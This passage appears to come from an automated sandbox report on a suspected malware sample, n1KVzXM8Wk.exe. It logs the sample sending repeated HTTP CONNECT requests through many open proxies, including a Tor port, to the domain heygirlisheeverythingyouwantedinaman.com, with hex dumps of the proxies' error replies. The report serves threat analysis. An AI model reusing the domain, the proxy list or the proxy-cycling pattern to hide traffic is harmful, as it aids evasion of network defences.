62 3e 3c 2f 70 3e 0a 3c 2f 62 6c 6f 63 6b 71 75 6f 74 65 3e 0a 0a 3c 70 20 69 64 3d 22 73 79 73 6d 73 67 22 3e 54 68 65 20 73 79 73 74 65 6d 20 72 65 74 75 72 6e 65 64 3a 20 3c 69 3e 50 6c 65 61 73 65 20 74 72 79 20 61 67 61 69 6e 20 6c 61 74 65 72 2e 3c 2f 69 3e 3c 2f 70 3e 0a 3c 62 72 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 68 72 3e 0a 3c 64 69 76 20 69 64 3d 22 66 6f 6f 74 65 72 22 3e 0a 3c 70 3e 47 65 6e 65 72 61 74 65 64 20 46 72 69 2c 20 32 33 20 46 65 62 20 32 30 32 34 20 30 38 3a 34 35 3a 31 39 20 47 4d 54 20 62 79 20 45 72 69 63 6f 6d 20 28 65 73 2d 70 72 6f 78 79 2d 61 75 74 68 29 3c 2f 70 3e 0a 3c 21 2d 2d 20 45 52 52
                                                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... body:lang(fa) { direction: rtl; font-size: 100%; font-family: Tahoma, Roya, sans-serif; float: right; }:lang(he) { direction: rtl; } --></style></head><body id=ERR_CANNOT_FORWARD><div id="titles"><h1>ERROR</h1><h2>The requested URL could not be retrieved</h2></div><hr><div id="content"><p>The following error was encountered while trying to retrieve the URL: <a href="https://heygirlisheeverythingyouwantedinaman.com/*">https://heygirlisheeverythingyouwantedinaman.com/*</a></p><blockquote id="error"><p><b>Shield is unable to forward your request to the configured upstream..</b></p></blockquote><p id="sysmsg">The system returned: <i>Please try again later.</i></p><br></div><hr><div id="footer"><p>Generated Fri, 23 Feb 2024 08:45:19 GMT by Ericom (es-proxy-auth)</p>... ERR


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      327192.168.2.450704188.164.193.17897336812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:19.722841024 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:20.256477118 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      328192.168.2.45071134.95.231.228420426812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:19.777625084 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:20.368649960 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:25.764889956 CET39INHTTP/1.1 200 Connection established


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      329192.168.2.450720184.185.2.1241456812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:19.782649040 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      330192.168.2.450826104.27.37.131806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:19.814332962 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:19.901653051 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:19 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      331192.168.2.450765184.72.36.89806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:19.826170921 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:19.987340927 CET344INHTTP/1.1 403 Forbidden
                                                                                                      Date: Fri, 23 Feb 2024 08:45:19 GMT
                                                                                                      Server: Apache
                                                                                                      Content-Length: 199
                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      332192.168.2.45077572.210.252.13741456812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:19.828124046 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      333192.168.2.450592199.102.107.14541456812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:19.828757048 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      334192.168.2.450833172.67.127.188806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:19.838435888 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:19.925348997 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:19 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      335192.168.2.450767213.136.79.177645566812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:19.850878000 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:20.368665934 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:20.975028038 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:22.178556919 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:24.365910053 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:26.682914019 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:28.866386890 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:33.365875959 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      336192.168.2.45078184.39.112.14431286812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:19.854213953 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:20.032099962 CET325INHTTP/1.1 400 Bad Request
                                                                                                      Server: nginx/1.14.2
                                                                                                      Date: Fri, 23 Feb 2024 08:44:39 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 173
                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.2</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      337192.168.2.45079846.182.6.69252956812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:19.862962961 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:20.368647099 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:20.865941048 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:21.865962982 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:23.866436958 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:25.866007090 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      338192.168.2.450839104.22.37.236806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:19.864383936 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:19.951320887 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:19 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      339192.168.2.45081791.134.140.160496876812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:19.878186941 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:20.439718962 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:21.037535906 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      340192.168.2.45083845.61.188.134444996812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:19.885554075 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      341192.168.2.4507238.213.137.15588886812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:19.922099113 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:22.225333929 CET39INHTTP/1.1 200 Connection established


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      342192.168.2.450709116.199.170.1741456812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:19.926898956 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      343192.168.2.45083137.235.48.19806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:19.929939985 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      344192.168.2.45084298.178.72.21109196812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:19.937639952 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      345192.168.2.450894104.18.44.93806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:19.940469027 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:20.027422905 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:19 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      346192.168.2.450897104.19.109.209806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:19.945240974 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:20.032990932 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:19 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      347192.168.2.450905162.159.242.158806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:19.950246096 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:20.037563086 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:19 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      348192.168.2.450857163.172.149.133163796812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:19.955885887 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:20.474965096 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:20.975085020 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:22.991699934 CET536INHTTP/1.0 501 Tor is not an HTTP Proxy
                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 53 20 50 72 6f 78 79 2c 20 4e 6f 74 20 41 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 73 20 70 72 6f 78 79 2c 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 3c 2f 68 31 3e 0a 3c 70 3e 0a 49 74 20 61 70 70 65 61 72 73 20 79 6f 75 20 68 61 76 65 20 63 6f 6e 66 69 67 75 72 65 64 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77 73 65 72 20 74 6f 20 75 73 65 20 74 68 69 73 20 54 6f 72 20 70 6f 72 74 20 61 73 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 3c 2f 70 3e 3c 70 3e 0a 54 68 69 73 20 69 73 20 6e 6f 74 20 63 6f 72 72 65 63 74 3a 20 54 68 69 73 20 70 6f 72 74 20 69 73 20 63 6f 6e 66 69 67 75 72 65 64 20 61 73 20 61 20 53 4f 43 4b 53 20 70 72 6f 78 79 2c 20 6e 6f 74 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 20 49 66 20 79 6f 75 20 6e 65 65 64 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 20 74 75 6e 6e 65 6c 2c 20 75 73 65 20 74 68 65 20 48 54 54 50 54 75 6e 6e 65 6c 50 6f 72 74 0a 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 6f 70 74 69 6f 6e 20 69 6e 20 70 6c 61 63 65 20 6f 66 2c 20 6f 72 20 69 6e 20 61 64 64 69 74 69 6f 6e 20 74 6f 2c 20 53 4f 43 4b 53 50 6f 72 74 2e 0a 50 6c 65 61 73 65 20 63 6f 6e 66 69
